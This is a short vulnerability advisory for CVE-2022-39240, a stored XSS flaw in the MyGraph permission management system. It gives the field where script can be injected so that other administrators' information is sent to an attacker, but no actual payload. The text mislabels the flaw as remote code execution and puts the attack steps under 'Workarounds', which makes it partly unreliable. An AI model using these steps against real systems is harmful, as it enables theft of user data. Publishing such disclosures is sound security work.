CVE-2022-39240: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in MyGraph

Impact

MyGraph is a permission management system.
MyGraph version 1.0.3 has a storage XSS vulnerability
Remote code execution vulnerability is a Web security vulnerability, we can execute any command, such as whoami.

Patches

https://github.com/renlm/MyGraph

Workarounds

After logging in to the background of MyGraph, you can add an XSS attack code in the “Project name” in the “Workbench” - “Knowledge Library” - “My Project” - "New", so that remote attackers can steal the user’s personal information, or even phishing.

References

None

For more information

Add XSS utilization code.

Set to public. The attacker can receive user information when other administrators access it.